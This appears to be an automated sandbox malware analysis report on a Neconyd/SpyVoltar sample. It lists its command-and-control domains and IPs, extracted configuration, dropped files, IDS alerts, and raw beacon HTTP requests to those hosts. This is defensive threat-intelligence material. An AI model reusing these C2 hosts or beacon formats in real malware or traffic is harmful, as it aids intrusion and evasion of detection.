15.197.204.56	mkkuei4kdsz.com	United States	7430	TANDEMUS	true

Contacted Domains

Name	IP	Active
lousta.net	193.166.255.171	true
mkkuei4kdsz.com	15.197.204.56	true
ow5dirasuek.com	52.34.198.229	true

Contacted URLs

Name	Malicious	Reputation
http://mkkuei4kdsz.com/	true	unknown
http://lousta.net/956/959.html	true	unknown
http://lousta.net/508/485.html	true	unknown
http://lousta.net/562/252.html	true	unknown
http://mkkuei4kdsz.com/516/243.html	true	unknown
http://ow5dirasuek.com/776/947.html	true	unknown
ht:/r.irsf.o/	true	unknown
http://ow5dirasuek.com/537/167.html	true	unknown
http://mkkuei4kdsz.com/353/421.html	true	unknown
http://mkkuei4kdsz.com/978/939.html	true	unknown
http://ow5dirasuek.com/292/164.html	true	unknown
http://lousta.net/740/238.html	true	unknown
http://lousta.net/333/645.html	true	unknown
http://mkkuei4kdsz.com/781/119.html	true	unknown
http://lousta.net/734/112.html	true	unknown
http://mkkuei4kdsz.com/488/933.html	true	unknown
ht:/w.irsf.o/	true	unknown
http://lousta.net/875/87.html	true	unknown
http://ow5dirasuek.com/546/102.html	true	unknown
http://lousta.net/547/467.html	true	unknown
http://lousta.net/78/665.html	true	unknown
http://lousta.net/263/482.html	true	unknown
http://ow5dirasuek.com/434/722.html	true	unknown
http://lousta.net/908/776.html	true	unknown
http://lousta.net/	true	unknown
http://lousta.net/528/262.html	true	unknown
http://mkkuei4kdsz.com/785/70.html	true	unknown
http://ow5dirasuek.com/945/466.html	true	unknown
http://lousta.net/497/157.html	true	unknown
http://mkkuei4kdsz.com/457/998.html	true	unknown
http://ow5dirasuek.com/	true	unknown
http://ow5dirasuek.com/763/794.html	true	unknown
http://lousta.net/527/338.html	true	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: bd0wJGTae5.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Windows\SysWOW64\omsecor.exe	Avira: detection malicious, Label: TR/SpyVoltar.absza
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Avira: detection malicious, Label: TR/SpyVoltar.absza

Found malware configuration

Source: bd0wJGTae5.exe

Malware Configuration Extractor: Neconyd {"C2 url": ["ht:/r.irsf.o/", "http://lousta.net/", "http://ow5dirasuek.com/", "ht:/w.irsf.o/", "http://mkkuei4kdsz.com/"]}

Multi AV Scanner detection for submitted file

Source: bd0wJGTae5.exe

ReversingLabs: Detection: 86%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Windows\SysWOW64\omsecor.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: bd0wJGTae5.exe

Joe Sandbox ML: detected

Suricata IDS alerts for network traffic

Source: bd0wJGTae5.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040ABD9 FindFirstFileW,FindClose,	0_2_0040ABD9
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	0_2_00408248
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040ABD9 FindFirstFileW,FindClose,	2_2_0040ABD9
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	2_2_00408248

Networking

Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49733 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49734 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49743 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49745 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49742 -> 15.197.204.56:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49747 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49741 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49730 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49732 -> 15.197.204.56:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49744 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49748 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49731 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49838 -> 15.197.204.56:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49798 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49844 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49945 -> 15.197.204.56:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49951 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49851 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49899 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49958 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50024 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50028 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50023 -> 15.197.204.56:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50027 -> 15.197.204.56:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50026 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50008 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:50025 -> 193.166.255.171:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: ht:/r.irsf.o/
Source: Malware configuration extractor	URLs: http://lousta.net/
Source: Malware configuration extractor	URLs: http://ow5dirasuek.com/
Source: Malware configuration extractor	URLs: ht:/w.irsf.o/
Source: Malware configuration extractor	URLs: http://mkkuei4kdsz.com/

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /875/87.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /740/238.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /516/243.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /546/102.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: ow5dirasuek.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /497/157.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /527/338.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /457/998.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /434/722.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473447\|1730473447\|0\|1\|0
Source: global traffic	HTTP traffic detected: GET /78/665.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /956/959.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /781/119.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /945/466.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473466\|1730473447\|9\|2\|0
Source: global traffic	HTTP traffic detected: GET /547/467.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /528/262.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /353/421.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /537/167.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473484\|1730473447\|13\|3\|0
Source: global traffic	HTTP traffic detected: GET /508/485.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /333/645.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /978/939.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /292/164.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473503\|1730473447\|16\|4\|0
Source: global traffic	HTTP traffic detected: GET /263/482.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /908/776.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /785/70.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /763/794.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473522\|1730473447\|17\|5\|0
Source: global traffic	HTTP traffic detected: GET /734/112.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /562/252.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /488/933.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /776/947.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473541\|1730473447\|18\|6\|0

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 193.166.255.171 193.166.255.171
Source: Joe Sandbox View	IP Address: 52.34.198.229 52.34.198.229

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: FUNETASFI FUNETASFI
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: TANDEMUS TANDEMUS

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2016998 - Severity 1 - ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host) : 192.168.2.4:49741 -> 193.166.255.171:80
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49735
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49769

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

0_2_00407036

Source: global traffic	HTTP traffic detected: GET /875/87.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /740/238.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /516/243.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /546/102.html HTTP/1.1From: 133749470339604713Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67Host: ow5dirasuek.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /497/157.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /527/338.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /457/998.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /434/722.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473447\|1730473447\|0\|1\|0
Source: global traffic	HTTP traffic detected: GET /78/665.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /956/959.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /781/119.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /945/466.html HTTP/1.1From: 133749470461635988Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473466\|1730473447\|9\|2\|0
Source: global traffic	HTTP traffic detected: GET /547/467.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /528/262.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /353/421.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /537/167.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473484\|1730473447\|13\|3\|0
Source: global traffic	HTTP traffic detected: GET /508/485.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /333/645.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /978/939.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /292/164.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473503\|1730473447\|16\|4\|0
Source: global traffic	HTTP traffic detected: GET /263/482.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /908/776.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /785/70.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /763/794.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473522\|1730473447\|17\|5\|0
Source: global traffic	HTTP traffic detected: GET /734/112.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /562/252.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: lousta.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /488/933.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: mkkuei4kdsz.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /776/947.html HTTP/1.1From: 133749470461635988Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93]nkbruotHost: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473541\|1730473447\|18\|6\|0

Source: global traffic	DNS traffic detected: DNS query: lousta.net
Source: global traffic	DNS traffic detected: DNS query: mkkuei4kdsz.com
Source: global traffic	DNS traffic detected: DNS query: ow5dirasuek.com

Source: omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.ne
Source: omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/263/482.html
Source: omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/263/482.html3
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/333/645.html
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2260322260.000000000069E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/497/157.html
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/497/157.htmlB
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/508/485.html
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/527/338.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/528/262.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/528/262.html9Tk-.
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/547/467.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/547/467.html4Wx
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/562/252.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/562/252.html.
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/562/252.htmlB
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/562/252.htmlY
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/562/252.htmlaba
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/562/252.htmlf
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/734/112.html
Source: omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/734/112.htmlk
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/740/238.html
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/740/238.htmlx
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/78/665.html
